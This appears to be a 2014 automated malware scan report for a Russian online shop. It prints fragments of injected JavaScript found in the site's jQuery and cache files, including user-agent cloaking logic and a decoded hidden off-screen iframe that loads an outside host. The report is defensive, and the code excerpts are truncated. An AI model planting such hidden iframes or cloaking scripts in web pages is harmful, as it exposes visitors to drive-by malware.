Scanned pages/files
Request | Server response | Status |
http://somresurs.ru/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 29 Sep 2014 17:04:33 GMT Location: http://www.somresurs.ru/ Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 310 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.somresurs.ru/ | 200 OK Content-Length: 65411 Content-Type: text/html | clean |
http://www.somresurs.ru/bitrix/cache/js/s1/eshop_blue/kernel_main/kernel_main.js?1385123422307042 | 200 OK Content-Length: 303537 Content-Type: application/javascript | clean |
http://somresurs.ru/bitrix/js/main/jquery/jquery-1.8.3.min.js?138512100795119 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 29 Sep 2014 17:04:36 GMT Location: http://www.somresurs.ru/bitrix/js/main/jquery/jquery-1.8.3.min.js?138512100795119 Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 367 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.somresurs.ru/bitrix/js/main/jquery/jquery-1.8.3.min.js?138512100795119 | 200 OK Content-Length: 95119 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh'; denygros Antivirus reports:
http://somresurs.ru/bitrix/cache/js/s1/eshop_blue/kernel_socialservices/kernel_socialservices.js?13851213722999 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 29 Sep 2014 17:04:36 GMT Location: http://www.somresurs.ru/bitrix/cache/js/s1/eshop_blue/kernel_socialservices/kernel_socialservices.js?13851213722999 Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 401 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.somresurs.ru/bitrix/cache/js/s1/eshop_blue/kernel_socialservices/kernel_socialservices.js?13851213722999 | 200 OK Content-Length: 2999 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ; ; (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh' function BxShowAuthFloat(id, suffix) { var bCreated = false; if(!bxAuthWnd) { bxAuthWnd = new BX.CDialog({ 'content':'<div id="bx_auth_float_container"></div>', 'width': 640, 'height': 400, 'resizable': false }); bCreated = true; } bxAuthWnd.Show(); if(bCreated) BX('bx_auth_float_container').appendChild(BX('bx_auth_float')); BxShowAuthService(id, suffix); } ; Decoded script: <iframe src=http://jaxworks.ru/ghj5.u35hh55hj?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe> Antivirus reports:
http://somresurs.ru/bitrix/cache/js/s1/eshop_blue/template_7a01a39f610e3ea0a1f64041268b32ec/template_7a01a39f610e3ea0a1f64041268b32ec_9b40a1bb3aacfbfa919e37545536ef2e.js?1385121372106607 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 29 Sep 2014 17:04:36 GMT Location: http://www.somresurs.ru/bitrix/cache/js/s1/eshop_blue/template_7a01a39f610e3ea0a1f64041268b32ec/template_7a01a39f610e3ea0a1f64041268b32ec_9b40a1bb3aacfbfa919e37545536ef2e.js?1385121372106607 Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 476 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.somresurs.ru/bitrix/cache/js/s1/eshop_blue/template_7a01a39f610e3ea0a1f64041268b32ec/template_7a01a39f610e3ea0a1f64041268b32ec_9b40a1bb3aacfbfa919e37545536ef2e.js?1385121372106607 | 200 OK Content-Length: 106607 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(".tabsblock > .tabs > a").live('click', function() { var ind = $(this).index(); ind++; if ($(this).hasClass("active")){} else { $(this).parents('.tabsblock').find('.active').removeClass('active') $(this).addClass('active'); $(".tabsblock").find(".cnt:nth-child("+ind+")").addClass('active'); } return false; }); $("#notify_auth_form > .social > form > ul > li > a").live('click', function() { setTimeout(function() this.WAIT.style.backgroundImage = "url('" + this.arParams.WAIT_IMAGE + "')"; if(!BX.browser.IsIE()) this.WAIT.style.backgroundRepeat = 'none'; this.WAIT.style.display = 'none'; this.WAIT.style.position = 'absolute'; this.WAIT.style.zIndex = '1100'; } setTimeout(this.onTimeout, 500); } BX.ready(function (){_this.Init(arParams)}); } ;; ; ; ; ; ; ; Antivirus reports:
http://somresurs.ru/about/how_to_order/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 29 Sep 2014 17:04:37 GMT Location: http://www.somresurs.ru/about/how_to_order/ Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 329 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.somresurs.ru/about/how_to_order/ | 200 OK Content-Length: 45518 Content-Type: text/html | clean |
http://www.somresurs.ru/about/delivery/ | 200 OK Content-Length: 45077 Content-Type: text/html | clean |
http://www.somresurs.ru/about/vacancy/ | 200 OK Content-Length: 45391 Content-Type: text/html | clean |
http://www.somresurs.ru/about/price/ | 200 OK Content-Length: 140092 Content-Type: text/html | clean |
http://www.somresurs.ru/about/contacts/ | 200 OK Content-Length: 46045 Content-Type: text/html | clean |
http://www.somresurs.ru//api-maps.yandex.ru/services/constructor/1.0/js/?sid=w0m3YAtXPDJ7nhOcEz2BI9rjn0qCkOGc&width=600&height=450/ | 404 Not Found Content-Length: 41450 Content-Type: text/html | clean |
http://www.somresurs.ru/login/?backurl=%2Fapi-maps.yandex.ru%2Fservices%2Fconstructor%2F1.0%2Fjs%2F%3Fsid%3Dw0m3YAtXPDJ7nhOcEz2BI9rjn0qCkOGc%26width%3D600%26height%3D450%252F | 200 OK Content-Length: 50538 Content-Type: text/html | clean |
http://www.somresurs.ru/login/?backurl=%2Flogin%2F | 200 OK Content-Length: 49422 Content-Type: text/html | clean |
http://www.somresurs.ru/login/?register=yes&backurl=%2Flogin%2F | 200 OK Content-Length: 46896 Content-Type: text/html | suspicious |
Suspicious code found <form method="post" action="/login/?register=yes&backurl=%2Flogin%2F" name="bform"> <input type="hidden" name="backurl" value="/login/?backurl=%2Flogin%2F" /> <input type="hidden" name="AUTH_FORM" value="Y" /> <input type="hidden" name="TYPE" value="REGISTRATION" /> Имя<br> <input type="text" name="USER_NAME" maxlength="50" value="" /><br/><br/> Фамилия<br> <input type="text" <input type="text" name="captcha_word" maxlength="50" value="" /> <p style="clear: left;"><input type="hidden" name="captcha_sid" value="01468dcf3071f386fc33eab6f4d0ca61" /> <img src="/bitrix/tools/captcha.php?captcha_sid=01468dcf3071f386fc33eab6f4d0ca61" width="180" height="40" alt="CAPTCHA" /></p> <input type="submit" class="bt3" style="width:100%;" name="Register" value="Зарегистрироваться" /> </form> | ||
http://www.somresurs.ru/personal/cart/ | 200 OK Content-Length: 45307 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: somresurs.ru
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 17:04:33 GMT
Location: http://www.somresurs.ru/
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
...310 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: somresurs.ru
Referer: http://www.google.com/search?q=somresurs.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=somresurs.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://somresurs.ru/
Result: somresurs.ru is not infected or malware details are not published yet.